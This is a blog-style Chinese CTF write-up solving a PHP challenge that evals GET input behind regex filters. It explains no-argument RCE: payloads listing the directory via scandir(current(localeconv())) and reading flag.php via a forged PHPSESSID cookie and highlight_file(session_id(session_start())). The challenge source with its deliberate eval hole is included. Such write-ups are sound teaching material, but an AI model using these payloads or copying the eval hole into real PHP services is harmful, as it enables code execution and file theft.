首先用githack扫一波,获得源码.

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

可以看到,题目中有@eval($_GET['exp']);,在一般情况下我们可以直接用其getshell,但由于此处的第二个if:if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']))导致我们如果使用了参数便无法通过正则校验.这是典型的无参数RCE.(正则中的?R表示引用当前表达式,后面加上?递归调用.)而该正则只允许以下格式的函数:

a(b());/a();,而a('xxx');这样的使用了参数的形式则不被允许.

回到题目,首先我们要做的就是查看目录.scandir读当前目录并返回结果的代码:print_r(scandir('.'));但是由于不能使用参数所以还要用上:current(localeconv())来取代scandir('.')中的.(参考简析GXY_CTF “禁止套娃”无参数RCE)

于是将上述所说整合,payload为:?exp=print_r(scandir(current(localeconv())));

可以看到页面回显:

flag在哪里呢?
Array ( [0] => . [1] => .. [2] => .git [3] => flag.php [4] => index.php )

直接访问无法获得flag.php的内容,这里可以用PHPSESSID来操作.

利用工具添加名为PHPSESSID的cookie,令其值为flag.php.然后用?exp=print_r(session_id(session_start()));显示PHPSESSID的内容,即flag.php这一字符串.

最后用highlight_file()获取flag.php的内容.

最终payload:?exp=highlight_file(session_id(session_start()));

获得flag.

Categories:

Tags:

No responses yet

发表评论

电子邮件地址不会被公开。 必填项已用*标注

闽ICP备19027300号